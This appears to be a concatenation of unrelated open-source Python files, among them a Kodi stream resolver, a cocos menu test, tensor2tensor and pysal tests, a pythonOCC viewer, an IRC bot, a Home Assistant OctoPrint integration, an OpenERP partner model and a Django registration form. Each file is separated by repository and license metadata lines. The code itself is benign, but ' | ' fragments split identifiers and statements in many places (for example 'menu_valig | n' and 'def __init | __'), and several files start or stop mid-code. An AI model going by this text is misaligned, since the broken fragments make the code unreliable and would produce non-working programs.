web_url = self.get_url(host, media_id)
dialog = xbmcgui.Dialog()
#grab stream details
try:
html = self.net.http_GET(web_url).content
html = unwise.unwise_process(html)
filekey = unwise.resolve_var(html, "flashvars.filekey")
error_url = None
stream_url = None
# try to resolve 3 times then give up
for x in range(0, 2):
link = self.__get_stream_url(media_id, filekey,
error_num=x,
error_url=error_url)
if link:
active = self.__is_stream_url_active(link)
if active:
stream_url = urllib.unquote(link)
break;
else:
# link inactive
error_url = link
else:
# no link found
raise Exception ('File Not Found or removed')
if stream_url:
return stream_url
else:
raise Exception ('File Not Found or removed')
except urllib2.URLError, e:
common.addon.log_error(self.name + ': got http error %d fetching %s' %
(e.code, web_url))
common.addon.show_small_popup('Error','Http error: '+str(e), 8000, error_logo)
return self.unresolvable(code=3, msg=e)
except Exception, e:
common.addon.log('**** videohut Error occured: %s' % e)
common.addon.show_small_popup(title='[B][COLOR white]videohut[/COLOR][/B]', msg='[COLOR red]%s[/COLOR]' % e, delay=5000, image=error_logo)
return self.unresolvable(code=0, msg=e)
|
vyscond/cocos | test/test_menu_centered.py | Python | bsd-3-clause | 1,329 | 0.034612 | from __future__ import division, print_function, unicode_literals
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, q"
tags = "menu, menu_valign, menu_halign"
from pyglet import image
from pyglet.gl import *
from pyglet import font
from cocos.director import *
from cocos.menu import *
from cocos.scene import *
from cocos.layer import | *
class MainMenu(Menu):
def __init__( self ):
super( MainMenu, self ).__init__("TITLE" )
self.menu_valig | n = CENTER
self.menu_halign = CENTER
# then add the items
items = [
( MenuItem('Item 1', self.on_quit ) ),
( MenuItem('Item 2', self.on_quit ) ),
( MenuItem('Item 3', self.on_quit ) ),
( MenuItem('Item 4', self.on_quit ) ),
( MenuItem('Item 5', self.on_quit ) ),
( MenuItem('Item 6', self.on_quit ) ),
( MenuItem('Item 7', self.on_quit ) ),
]
self.create_menu( items, shake(), shake_back() )
def on_quit( self ):
pyglet.app.exit()
def main():
pyglet.font.add_directory('.')
director.init( resizable=True)
director.run( Scene( MainMenu() ) )
if __name__ == '__main__':
main()
|
rsepassi/tensor2tensor | tensor2tensor/data_generators/gene_expression_test.py | Python | apache-2.0 | 2,513 | 0.002786 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Genetics problems."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from tensor2tensor.data_generators import dna_encoder
from tensor2tensor.data_generators import gene_expression
import tensorflow as tf
class GeneticsTest(tf.test.TestCase):
def _oneHotBases(self, bases):
ref = ["A", "C", "T", "G"]
one_hots = []
for base in bases:
one_hot = [False] * 4
if base in ref:
one_hot[ref.index(base)] = True
one_hots.append(one_hot)
return np.array(one_hots)
def testRecordToExample(self | ):
encoder = dna_encoder.DNAEncoder(chunk_size=2)
raw_inputs = ["A", "C", "G", "N", "C", "T"]
# Put in numpy arrays in the same format as in the h5 file
inputs = self._o | neHotBases(raw_inputs)
mask = np.array([True, False, True])
outputs = np.array([[1.0, 2.0, 3.0], [5.0, 1.0, 0.2], [5.1, 2.3, 2.3]])
# Convert to example dict
ex_dict = gene_expression.to_example_dict(encoder, inputs, mask, outputs)
self.assertEqual(len(raw_inputs) // 2 + 1, len(ex_dict["inputs"]))
self.assertAllEqual(encoder.encode(raw_inputs) + [1], ex_dict["inputs"])
self.assertAllEqual([1.0, 0.0, 1.0], ex_dict["targets_mask"])
self.assertAllEqual([1.0, 2.0, 3.0, 5.0, 1.0, 0.2, 5.1, 2.3, 2.3],
ex_dict["targets"])
self.assertAllEqual([3, 3], ex_dict["targets_shape"])
def testGenerateShardArgs(self):
num_examples = 37
num_shards = 4
outfiles = [str(i) for i in range(num_shards)]
shard_args = gene_expression.generate_shard_args(outfiles, num_examples)
starts, ends, fnames = zip(*shard_args)
self.assertAllEqual([0, 9, 18, 27], starts)
self.assertAllEqual([9, 18, 27, 37], ends)
self.assertAllEqual(fnames, outfiles)
if __name__ == "__main__":
tf.test.main()
|
siconos/siconos-deb | externals/renderer/SimpleGui.py | Python | apache-2.0 | 7,843 | 0.00459 | #!/usr/bin/env python
##Copyright 2009-2014 Thomas Paviot (tpaviot@gmail.com)
##
##This file is part of pythonOCC.
##
##pythonOCC is free software: you can redistribute it and/or modify
##it under the terms of the GNU Lesser General Public License as published by
##the Free Software Foundation, either version 3 of the License, or
##(at your option) any later version.
##
##pythonOCC is distributed in the hope that it will be useful,
##but WITHOUT ANY WARRANTY; without even the implied warranty of
##MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
##GNU Lesser General Public License for more details.
##
##You should have received a copy of the GNU Lesser General Public License
##along with pythonOCC. If not, see <http://www.gnu.org/licenses/>.
import sys
from OCC import VERSION
def get_backend():
"""
loads a backend
backends are loaded in order of preference
since python comes with Tk included, but that PySide or PyQt4
is much preferred
"""
try:
from PyQt4 import QtCore, QtGui
return 'qt-pyqt4'
except:
pass
try:
from PySide import QtCore, QtGui
return 'qt-pyside'
except:
pass
# Check wxPython
try:
import wx
return 'wx'
except:
raise ImportError("No compliant GUI library found. You must have either PySide, PyQt4 or wxPython installed.")
sys.exit(1)
def init_display(backend_str=None, size=(1024, 768)):
global display, add_menu, add_function_to_menu, start_display, app, win, USED_BACKEND
if not backend_str:
USED_BACKEND = get_backend()
elif backend_str in ['wx', 'qt-pyside', 'qt-pyqt4']:
USED_BACKEND = backend_str
else:
raise ValueError("You should pass either 'wx','qt' or 'tkinter' to the init_display function.")
sys.exit(1)
# wxPython based simple GUI
if USED_BACKEND == 'wx':
try:
import wx
except:
raise ImportError("Please install wxPython.")
from wxDisplay import wxViewer3d
class AppFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "Siconos mechanisms visualization based on pythonOCC-%s 3d viewer ('wx' backend)" % VERSION, style=wx.DEFAULT_FRAME_STYLE, size=size)
self.canva = wxViewer3d(self)
self.menuBar = wx.MenuBar()
self._menus = {}
self._menu_methods = {}
def add_menu(self, menu_name):
_menu = wx.Menu()
self.menuBar.Append(_menu, "&"+menu_name)
self.SetMenuBar(self.menuBar)
self._menus[menu_name] = _menu
def add_function_to_menu(self, menu_name, _callable):
# point on curve
_id = wx.NewId()
assert callable(_callable), 'the function supplied is not callable'
try:
self._menus[menu_name].Append(_id, _callable.__name__.replace('_', ' ').lower())
except KeyError:
raise ValueError('the menu item %s does not exist' % menu_name)
self.Bind(wx.EVT_MENU, _callable, id=_id)
app = wx.PySimpleApp()
win = AppFrame(None)
win.Show(True)
wx.SafeYield()
win.canva.InitDriver()
app.SetTopWindow(win)
display = win.canva._display
def add_menu(*args, **kwargs):
win.add_menu(*args, **kwargs)
def add_function_to_menu(*args, **kwargs):
win.add_function_to_menu(*args, **kwargs)
def start_display():
app.MainLoop()
# Qt based simple GUI
elif 'qt' in USED_BACKEND:
from OCC.Display.qtDisplay import qtViewer3d, get_qt_modules
QtCore, QtGui, QtOpenGL = get_qt_modules()
class MainWindow(QtGui.QMainWindow):
def __init__(self, *args):
QtGui.QMainWindow.__init__(self, *args)
self.canva = qtViewer3d(self)
self.setWindowTitle("Siconos mechanisms visualization based on pythonOCC-%s 3d viewer ('%s' backend)" % (VERSION, USED_BACKEND))
self.resize(size[0], size[1])
self.setCentralWidget(self.canva)
if not sys.platform == 'darwin':
self.menu_bar = self.menuBar()
else:
# create a parentless menubar
# see: http://stackoverflow.com/questions/11375176/qmenubar-and-qmenu-doesnt-show-in-mac-os-x?lq=1
# noticeable is that the menu ( alas ) is created in the topleft of the screen, just
# next to the apple icon
# still does ugly things like showing the "Python" menu in bold
self.menu_bar = QtGui.QMenuBar()
self._menus = {}
self._menu_methods = {}
# place the window in the center of the screen, at half the screen size
self.centerOnScreen()
def centerOnScreen(self):
'''Centers the window on the screen.'''
resolution = QtGui.QDesktopWidget().screenGeometry()
self.move((resolution.width() / 2) - (self.frameSize().width() / 2),
(resolution.height() / 2) - (self.frameSize().height() / 2))
def add_menu(self, menu_name):
_menu = self.menu_bar.addMenu("&"+menu_name)
self._menus[menu_name] = _menu
def add_function_to_menu(self, menu_name, _callable):
assert callable(_callable), 'the function supplied is not callable'
try:
_action = QtGui.QAction(_callable.__name__.replace('_', ' ' | ).lower(), self)
# if not, the "exit" action is now shown...
_action.setMenuRole(QtGui.QAction.NoRole)
self.connect(_action, QtCore.SIGNAL("triggered()"), _callable)
self._menus[menu_name].addAction(_a | ction)
except KeyError:
raise ValueError('the menu item %s does not exist' % menu_name)
# following couple of lines is a twek to enable ipython --gui='qt'
app = QtGui.QApplication.instance() # checks if QApplication already exists
if not app: # create QApplication if it doesnt exist
app = QtGui.QApplication(sys.argv)
win = MainWindow()
win.show()
win.canva.InitDriver()
display = win.canva._display
if sys.platform != "linux2":
display.EnableAntiAliasing()
# background gradient
display.set_bg_gradient_color(206, 215, 222, 128, 128, 128)
# display black trihedron
display.display_trihedron()
def add_menu(*args, **kwargs):
win.add_menu(*args, **kwargs)
def add_function_to_menu(*args, **kwargs):
win.add_function_to_menu(*args, **kwargs)
def start_display():
win.raise_() # make the application float to the top
app.exec_()
return display, start_display, add_menu, add_function_to_menu, win, app
if __name__ == '__main__':
display, start_display, add_menu, add_function_to_menu = init_display()
from OCC.BRepPrimAPI import BRepPrimAPI_MakeSphere, BRepPrimAPI_MakeBox
def sphere(event=None):
display.DisplayShape(BRepPrimAPI_MakeSphere(100).Shape(), update=True)
def cube(event=None):
display.DisplayShape(BRepPrimAPI_MakeBox(1, 1, 1).Shape(), update=True)
def exit(event=None):
sys.exit()
add_menu('primitives')
add_function_to_menu('primitives', sphere)
add_function_to_menu('primitives', cube)
add_function_to_menu('primitives', exit)
start_display()
|
taygetea/lwbot | bot.py | Python | mit | 2,345 | 0.004264 | from twisted.words.protocols import irc
from twisted.internet import protocol
import re
import plugins.pomodoro
print plugins.modules
class IrcBot(irc.IRCClient):
def _get_nickname(self):
return self.factory.nickname
nickname = property(_get_nickname)
def signedOn(self):
self.join(self.factory.channel)
print "Signed on as %s." % (self.nickname,)
def joined(self, channel):
print "Joined %s." % (channel,)
"""
< hugaraxia> When a ban is placed by an op, PM the op for a timeframe to remove the ban (accept "10m" or "2h" or "30d"), and then start timer, remove ban when time is up (+random interval to prevent gaming?). If op doesn't reply: Sane default. (5h?) (Perhaps announce ban time, possibly in ##meta: fuzzy them to "short", "long", "very long" to prevent gaming.)
7839-07:12 < hugaraxia> When ban is placed, optionally on very long bans: Start a timer for 1hr: Message #lw-meta that ban discussion on <username> is now allowed.
"""
def privmsg(self, user, channel, msg):
reload(plugins)
print irc.parseModes(msg)
if msg.startswith(self.nickname):
msg = re.compile(self.nickname + "[:,]* ?", re.I).sub('', msg)
prefix = "%s: " % (user.split('!', 1)[0], )
print msg
built = prefix + msg
self.msg(self.factory.channel, built)
else:
prefix = ''
class Bantimer:
def __init | __(self, op, user, channel):
self.operator = op
self.banned = user
self.ch | annel = channel
def timer(self):
def opmsg(self):
IrcBot.privmsg(self.op, self.channel, "ban " + self.user + "?")
class IrcBotFactory(protocol.ClientFactory):
protocol = IrcBot
def __init__(self, channel, nickname='Elua'):
self.channel = channel
self.nickname = nickname
self.password = "password"
def clientConnectionLost(self, connector, reason):
print "Lost connection (%s), reconnecting." % (reason,)
connector.connect()
def clientConnectionFailed(self, connector, reason):
print "Could not connect: %s" % (reason,)
from twisted.internet import reactor
if __name__ == "__main__":
chan = 'bot' #sys.argv[1]
reactor.connectTCP('localhost', 6667, IrcBotFactory('#' + chan))
reactor.run()
|
DemocracyClub/EveryElection | every_election/apps/elections/migrations/0020_auto_20170110_1556.py | Python | bsd-3-clause | 823 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-01-10 15:56
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [("election | s", "0019_auto_20170110_ | 1329")]
operations = [
migrations.AddField(
model_name="electedrole",
name="elected_role_name",
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name="election",
name="group",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="children",
to="elections.Election",
),
),
]
|
mezz64/home-assistant | homeassistant/components/octoprint/__init__.py | Python | apache-2.0 | 7,884 | 0.001268 | """Support for monitoring OctoPrint 3D printers."""
from datetime import timedelta
import logging
from typing import cast
from pyoctoprintapi import ApiError, OctoprintClient, PrinterOffline
import voluptuous as vol
from yarl import URL
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_API_KEY,
CONF_BINARY_SENSORS,
CONF_HOST,
CONF_MONITORED_CONDITIONS,
CONF_NAME,
CONF_PATH,
CONF_PORT,
CONF_SENSORS,
CONF_SSL,
Platform,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import slugify as util_slugify
import homeassistant.util.dt as dt_util
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
def has_all_unique_names(value):
"""Validate that printers have an unique name."""
names = [util_slugify(printer["name"]) for printer in value]
vol.Schema(vol.Unique())(names)
return value
def ensure_valid_path(value):
"""Validate the path, ensuring it starts and ends with a /."""
vol.Schema(cv.string)(value)
if value[0] != "/":
value = f"/{value}"
if value[-1] != "/":
value += "/"
return value
PLATFORMS = [Platform.BINARY_SENSOR, Platform.SENSOR]
DEFAULT_NAME = "OctoPrint"
CONF_NUMBER_OF_TOOLS = "number_of_tools"
CONF_BED = "bed"
BINARY_SENSOR_TYPES = [
"Printing",
"Printing Error",
]
BINARY_SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(
CONF_MONITORED_CONDITIONS, default=list(BINARY_SENSOR_TYPES)
): vol.All(cv.ensure_list, [vol.In(BINARY_SENSOR_TYPES)]),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
SENSOR_TYPES = [
"Temperatures",
"Current State",
"Job Percentage",
"Time Remaining",
"Time Elapsed",
]
SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
CONFIG_SCHEMA = vol.Schema(
vol.All(
cv.deprecated(DOMAIN),
{
DOMAIN: vol.All(
cv.ensure_list,
[
vol.Schema(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Optional(CONF_PORT, default=80): cv.port,
vol.Optional(CONF_PATH, default="/"): ensure_valid_path,
# Following values are not longer used in the configuration of the integration
# and are here for historical purposes
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(
CONF_NUMBER_OF_TOOLS, default=0
): cv.positive_int,
vol.Optional(CONF_BED, default=False): cv.boolean,
vol.Optional(CONF_SENSORS, default={}): SENSOR_SCHEMA,
vol.Optional(
CONF_BINARY_SENSORS, default={}
): BINARY_SENSOR_SCHEMA,
}
)
],
has_all_unique_names,
)
},
),
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the OctoPrint component."""
if DOMAIN not in config:
return True
domain_config = config[DOMAIN]
for conf in domain_config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data={
CONF_API_KEY: conf[CONF_API_KEY],
CONF_HOST: conf[CONF_HOST],
CONF_PATH: conf[CONF_PATH],
CONF_PORT: conf[CONF_PORT],
CONF_SSL: conf[CONF_SSL],
},
)
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up OctoPrint from a config entry."""
if DOMAIN not in hass.data:
hass.data[DOMAIN] = {}
websession = async_get_clientsession(hass)
client = OctoprintClient(
entry.data[CONF_HOST],
websession,
entry.data[CONF_PORT],
| entry.data[CONF_SSL],
entry.data[CONF_PATH],
)
client.set_api_key(entry.data[CONF_API | _KEY])
coordinator = OctoprintDataUpdateCoordinator(hass, client, entry, 30)
await coordinator.async_config_entry_first_refresh()
hass.data[DOMAIN][entry.entry_id] = {"coordinator": coordinator, "client": client}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
class OctoprintDataUpdateCoordinator(DataUpdateCoordinator):
"""Class to manage fetching Octoprint data."""
config_entry: ConfigEntry
def __init__(
self,
hass: HomeAssistant,
octoprint: OctoprintClient,
config_entry: ConfigEntry,
interval: int,
) -> None:
"""Initialize."""
super().__init__(
hass,
_LOGGER,
name=f"octoprint-{config_entry.entry_id}",
update_interval=timedelta(seconds=interval),
)
self.config_entry = config_entry
self._octoprint = octoprint
self._printer_offline = False
self.data = {"printer": None, "job": None, "last_read_time": None}
async def _async_update_data(self):
"""Update data via API."""
printer = None
try:
job = await self._octoprint.get_job_info()
except ApiError as err:
raise UpdateFailed(err) from err
# If octoprint is on, but the printer is disconnected
# printer will return a 409, so continue using the last
# reading if there is one
try:
printer = await self._octoprint.get_printer_info()
except PrinterOffline:
if not self._printer_offline:
_LOGGER.debug("Unable to retrieve printer information: Printer offline")
self._printer_offline = True
except ApiError as err:
raise UpdateFailed(err) from err
else:
self._printer_offline = False
return {"job": job, "printer": printer, "last_read_time": dt_util.utcnow()}
@property
def device_info(self) -> DeviceInfo:
"""Device info."""
unique_id = cast(str, self.config_entry.unique_id)
configuration_url = URL.build(
scheme=self.config_entry.data[CONF_SSL] and "https" or "http",
host=self.config_entry.data[CONF_HOST],
port=self.config_entry.data[CONF_PORT],
path=self.config_entry.data[CONF_PATH],
)
return DeviceInfo(
identifiers={(DOMAIN, unique_id)},
manufacturer="OctoPrint",
name="OctoPrint",
configuration_url=str(configuration_url),
)
|
tkalus/fogspoon | fogspoon/api/__init__.py | Python | mit | 1,585 | 0 | # -*- coding: utf-8 -*-
import simplejson as json
from functools import wraps
from flask import current_app, jsonify, request
from ..core import FogspoonError
from ..helpers import JSONEncoder
from .. impo | rt factory
def create_app(settings_override=None):
"""Returns the Fogspoon API application instance"""
app = factory.create_app(__name__, __path__, settings_override)
# Set the default JSON encoder
app.json_encoder = JSONEncoder
# Register custom error handlers
app.errorhandler(FogspoonError)(on_fogspoon_error)
app.errorhandler(404)(on_404)
return app
def route(bp, *args, **kwargs):
"""
| decorator that does blueprint fun and jsonify for api calls
"""
kwargs.setdefault('strict_slashes', False)
def decorator(f):
@bp.route(*args, **kwargs)
@wraps(f)
def wrapper(*args, **kwargs):
sc = 200
rv = f(*args, **kwargs)
if isinstance(rv, tuple):
sc = rv[1]
rv = rv[0]
# JSONP support too!
callback = request.args.get('callback', False)
if callback:
content = str(callback) + '(' + json.dumps(rv) + ')'
mimetype = 'application/javascript'
return current_app.response_class(content, mimetype=mimetype)
else:
return jsonify(dict(data=rv)), sc
return f
return decorator
def on_fogspoon_error(e):
return jsonify(dict(error=e.msg)), 400
def on_404(e):
return jsonify(dict(error='Not found')), 404
|
sjsrey/pysal_core | pysal_core/weights/tests/test_spatial_lag.py | Python | bsd-3-clause | 2,394 | 0.00543 |
import os
import unittest
from ..weights import W
from ..util import lat2W
from ..spatial_lag import lag_spatial, lag_categorical
import numpy as np
class Test_spatial_lag(unittest.TestCase):
def setUp(self):
self.neighbors = {'c': ['b'], 'b': ['c', 'a'], 'a': ['b']}
self.weights = {'c': [1.0], 'b': [1.0, 1.0], 'a': [1.0]}
self.id_order = ['a', 'b', 'c']
self.weights = {'c': [1.0], | 'b': [1.0, 1.0], 'a': [1.0]}
self.w = W(self.neighbors, self.weights, self.id_order)
self.y = np.array([0, 1, 2])
self.wlat = lat2W(3, 3)
self.ycat = ['a','b','a','b','c','b','c','b','c']
self.ycat2 = ['a', 'c', 'c', 'd', 'b', 'a', 'd', 'd', 'c']
self.ym = | np.vstack((self.ycat,self.ycat2)).T
self.random_seed = 503
def test_lag_spatial(self):
yl = lag_spatial(self.w, self.y)
np.testing.assert_array_almost_equal(yl, [1., 2., 1.])
self.w.id_order = ['b', 'c', 'a']
y = np.array([1, 2, 0])
yl = lag_spatial(self.w, y)
np.testing.assert_array_almost_equal(yl, [2., 1., 1.])
w = lat2W(3, 3)
y = np.arange(9)
yl = lag_spatial(w, y)
ylc = np.array([4., 6., 6., 10., 16., 14., 10., 18., 12.])
np.testing.assert_array_almost_equal(yl, ylc)
w.transform = 'r'
yl = lag_spatial(w, y)
ylc = np.array(
[2., 2., 3., 3.33333333, 4.,
4.66666667, 5., 6., 6.])
np.testing.assert_array_almost_equal(yl, ylc)
def test_lag_categorical(self):
yl = lag_categorical(self.wlat, self.ycat)
np.random.seed(self.random_seed)
known = np.array(['b', 'a', 'b', 'c', 'b', 'c', 'b', 'c', 'b'])
np.testing.assert_array_equal(yl, known)
ym_lag = lag_categorical(self.wlat,self.ym)
known = np.array([['b', 'b'],
['a', 'c'],
['b', 'c'],
['c', 'd'],
['b', 'd'],
['c', 'c'],
['b', 'd'],
['c', 'd'],
['b', 'b']])
np.testing.assert_array_equal(ym_lag, np.asarray(known))
suite = unittest.TestLoader().loadTestsFromTestCase(Test_spatial_lag)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite)
|
gisce/OCB | openerp/addons/base/res/res_partner.py | Python | agpl-3.0 | 41,659 | 0.005329 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
from lxml import etree
import math
import pytz
import re
import openerp
from openerp import SUPERUSER_ID
from openerp import pooler, tools
from openerp.osv import osv, fields, orm
from openerp.osv.expression import get_unaccent_wrapper
from openerp.tools.translate import _
from openerp.tools.yaml_import import is_comment
class format_address(object):
def fields_view_get_address(self, cr, uid, arch, context={}):
user_obj = self.pool.get('res.users')
fmt = user_obj.browse(cr, SUPERUSER_ID, uid, context).company_id.country_id
fmt = fmt and fmt.address_format
layouts = {
'%(city)s %(state_code)s\n%(zip)s': """
<div class="address_format">
<field name="city" placeholder="City" style="width: 50%%"/>
<field name="state_id" class="oe_no_button" placeholder="State" style="width: 47%%" options='{"no_open": true}'/>
<br/>
<field name="zip" placeholder="ZIP"/>
</div>
""",
'%(zip)s %(city)s': """
<div class="address_format">
<field name="zip" placeholder="ZIP" style="width: 40%%"/>
<field name="city" placeholder="City" style="width: 57%%"/>
<br/>
<field name="state_id" class="oe_no_button" placeholder="State" options='{"no_open": true}'/>
</div>
""",
'%(city)s\n%(state_name)s\n%(zip)s': """
<div class="address_format">
<field name="city" placeholder="City"/>
<field name="state_id" class="oe_no_button" placeholder="State" options='{"no_open": true}'/>
<field name="zip" placeholder="ZIP"/>
</div>
"""
}
for k,v in layouts.items():
if fmt and (k in fmt):
doc = etree.fromstring(arch)
for node in doc.xpath("//div[@class='address_format']"):
tree = etree.fromstring(v)
node.getparent().replace(node, tree)
arch = etree.tostring(doc)
break
return arch
def _tz_get(self,cr,uid, context=None):
# put POSIX 'Etc/*' entries at the end to avoid confusing users - see bug 1086728
return [(tz,tz) for tz in sorted(pytz.all_timezones, key=lambda tz: tz if not tz.startswith('Etc/') else '_')]
class res_partner_category(osv.osv):
def name_get(self, cr, uid, ids, context=None):
""" Return the categories' display name, including their direct
parent by default.
If ``context['partne | r_category_display']`` is ``'short'``, the short
version of the category name (without the direct parent) is used.
The default is the long version.
"""
if not isinstance(ids, list):
ids = [ids]
if context is None:
context = {}
if context.get('partner_category_display') == 'short':
return super(res_partner_category, self).name_get(cr, uid, ids, con | text=context)
res = []
for category in self.browse(cr, uid, ids, context=context):
names = []
current = category
while current:
names.append(current.name)
current = current.parent_id
res.append((category.id, ' / '.join(reversed(names))))
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
if not context:
context = {}
if name:
# Be sure name_search is symetric to name_get
name = name.split(' / ')[-1]
ids = self.search(cr, uid, [('name', operator, name)] + args, limit=limit, context=context)
else:
ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, ids, context)
def _name_get_fnc(self, cr, uid, ids, prop, unknow_none, context=None):
res = self.name_get(cr, uid, ids, context=context)
return dict(res)
_description = 'Partner Categories'
_name = 'res.partner.category'
_columns = {
'name': fields.char('Category Name', required=True, size=64, translate=True),
'parent_id': fields.many2one('res.partner.category', 'Parent Category', select=True, ondelete='cascade'),
'complete_name': fields.function(_name_get_fnc, type="char", string='Full Name'),
'child_ids': fields.one2many('res.partner.category', 'parent_id', 'Child Categories'),
'active': fields.boolean('Active', help="The active field allows you to hide the category without removing it."),
'parent_left': fields.integer('Left parent', select=True),
'parent_right': fields.integer('Right parent', select=True),
'partner_ids': fields.many2many('res.partner', id1='category_id', id2='partner_id', string='Partners'),
}
_constraints = [
(osv.osv._check_recursion, 'Error ! You can not create recursive categories.', ['parent_id'])
]
_defaults = {
'active': 1,
}
_parent_store = True
_parent_order = 'name'
_order = 'parent_left'
class res_partner_title(osv.osv):
    # Salutation/title records (e.g. for partners or contacts).
    _name = 'res.partner.title'
    _order = 'name'
    _columns = {
        'name': fields.char('Title', required=True, size=46, translate=True),
        'shortcut': fields.char('Abbreviation', size=16, translate=True),
        # Whether the title applies to companies ('partner') or people ('contact').
        'domain': fields.selection([('partner', 'Partner'), ('contact', 'Contact')], 'Domain', required=True, size=24)
    }
    _defaults = {
        'domain': 'contact',
    }
def _lang_get(self, cr, uid, context=None):
lang_pool = self.pool.get('res.lang')
ids = lang_pool.search(cr, uid, [], context=context)
res = lang_pool.read(cr, uid, ids, ['code', 'name'], context)
return [(r['code'], r['name']) for r in res]
# fields copy if 'use_parent_address' is checked
# These address fields are synchronized from the parent partner record.
ADDRESS_FIELDS = ('street', 'street2', 'zip', 'city', 'state_id', 'country_id')
POSTAL_ADDRESS_FIELDS = ADDRESS_FIELDS # deprecated, to remove after 7.0
class res_partner(osv.osv, format_address):
_description = 'Partner'
_name = "res.partner"
def _address_display(self, cr, uid, ids, name, args, context=None):
res = {}
for partner in self.browse(cr, uid, ids, context=context):
res[partner.id] = self._display_address(cr, uid, partner, context=context)
return res
def _get_image(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = tools.image_get_resized_images(obj.image)
return result
def _get_tz_offset(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = datetime.datetime.now(pytz.timezone(obj.tz or 'GMT')).strftime('%z')
return result
def _set_image(self, cr, uid, id, name, value, arg |
ekivemark/bofhirdev | accounts/forms/other.py | Python | gpl-2.0 | 2,816 | 0.002131 | """
accounts
FILE: forms.py
Created: 6/21/15 8:31 PM
"""
__author__ = 'Mark Scrimshire:@ekivemark'
from django.conf import settings
from django import forms
from django.utils.safestring import mark_safe
from registration.forms import (RegistrationFormUniqueEmail,
RegistrationFormTermsOfService)
from accounts.models import User
class Email(forms.EmailField):
    """EmailField that lower-cases input and rejects already-registered addresses."""

    def clean(self, value):
        """Normalize to lower case, run base validation, then enforce uniqueness."""
        if settings.DEBUG:
            print("email is ", value)
        value = value.lower()
        # Base-class validation runs for its side effects; its return value is unused.
        super(Email, self).clean(value)
        try:
            User.objects.get(email=value)
        except User.DoesNotExist:
            # No account uses this address: accept the cleaned value.
            if settings.DEBUG:
                print("no match on user:", value)
            return value
        raise forms.ValidationError(mark_safe(
            "This email is already registered. <br/>Use <a href='/password/reset'>this forgot password</a> link or on the <a href ='/accounts/login?next=/'>login page</a>."))
class UserRegistrationForm(forms.ModelForm):
    """
    A form for creating new users. Includes all the required
    fields, plus a repeated password.
    """
    # email will be become username
    email = Email()
    password1 = forms.CharField(widget=forms.PasswordInput(),
                                label="Password")
    password2 = forms.CharField(widget=forms.PasswordInput(),
                                label="Repeat your password")
    # NOTE(review): ``fields`` is declared at class level, not inside a
    # ``Meta`` class -- a ModelForm normally reads field selection from
    # ``Meta.fields``; confirm this attribute is actually honored.
    fields = ['user', 'email', 'password1', 'password2' ]
    def clean_user(self):
        """
        We need to check that user is not containing spaces.
        We also need to make sure it is lower case
        :return: self
        """
        data = self.cleaned_data['user']
        # remove spaces
        data = data.replace(" ", "")
        # Convert to lowercase
        data = data.lower()
        if data == "":
